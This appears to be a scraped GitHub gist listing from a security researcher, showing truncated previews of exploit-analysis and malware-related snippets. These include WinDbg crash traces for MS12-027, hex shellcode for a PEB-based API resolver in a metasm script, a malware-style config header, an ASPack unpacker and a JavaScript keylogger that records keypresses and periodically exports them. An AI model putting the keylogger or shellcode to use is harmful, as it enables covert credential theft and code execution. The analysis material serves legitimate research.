This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def xor(str, key) | |
| str.split(//).collect {|e| [e.unpack('C').first ^ (key.to_i & 0xFF)].pack('C') }.join | |
| end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'eventmachine' | |
| require 'socket' | |
| $port = 9595 | |
| $connections = [] | |
| $timer_i = 3 | |
| class SlowServerConnection < EventMachine::Connection | |
| def initialize(*args) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define WIN32_LEAN_AND_MEAN | |
| #include <windows.h> | |
| #include <winnt.h> | |
| #include <intrin.h> | |
| typedef struct _UNICODE_STR | |
| { | |
| USHORT Length; | |
| USHORT MaximumLength; | |
| PWSTR pBuffer; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0:011> u @eip | |
| <Unloaded_i.dll>+0x1e: | |
| 0000001f ?? ??? | |
| ^ Memory access error in 'u @eip' | |
| 0:011> dd @esp | |
| 03e2fde0 0095cadd 010dd544 00000000 001e3206 | |
| 03e2fdf0 05566a80 001f3e98 001f0ba0 000003a7 | |
| 03e2fe00 05566a95 0063028b 05566a80 00000000 | |
| 03e2fe10 001523aa 0542dbd8 03e2fe78 0015238d | |
| 03e2fe20 00000000 0557ec70 001e3206 0512c888 |
abhisek
/ MS12-027 Crash Analysis
Created
May 28, 2012 08:41
MS12-027 Analysis: Encrypted Word Document Structure
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Crash Stack Trace: | |
| 0:000> kb | |
| ChildEBP RetAddr Args to Child | |
| WARNING: Stack unwind information not available. Following frames may be wrong. | |
| 0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87 | |
| 0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6 | |
| 00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $:.unshift("E:\\Tools\\metasm") | |
| require 'metasm' | |
| require 'optparse' | |
| $ASMCODE = | |
| # Win32 PEB based API Resolver | |
| # Metasm seems to fail on jecxz so we compile using nasm and use the binary | |
| "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + | |
| "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var WEBKEY = { | |
| dataLog: "", | |
| start: function() { | |
| window.onkeypress = function(ev) { | |
| WEBKEY.dataLog += String.fromCharCode(ev.charCode); | |
| } | |
| setInterval("WEBKEY.exportLog();", 5000); | |
| }, | |
| exportLog: function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef _CONFIG_H | |
| #define _CONFIG_H | |
| #define CFG_SRV_PORT 8389 | |
| #define CFG_MUTEX TEXT("BatMan") | |
| #define CFG_SRV_FLAG TEXT("-booyah") | |
| #endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # ASPack 2.29 unpacker via. Dynamic Analysis | |
| # | |
| $:.unshift("C:\\Lib\\metasm") | |
| require 'metasm' | |
| AS229_OEP_PUSH_OFFSET = 0x420 | |
| def _msg(m, error = false) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // non-reentrant | |
| CHAR *_ToLowerCase(char *p) | |
| { | |
| static char _s_lower_str[4000]; | |
| int i; | |
| memset(_s_lower_str, 0, sizeof(_s_lower_str)); | |
| for(i = 0; i < strlen(p); i++) | |
| _s_lower_str[i] = tolower((int) p[i]); | |
OlderNewer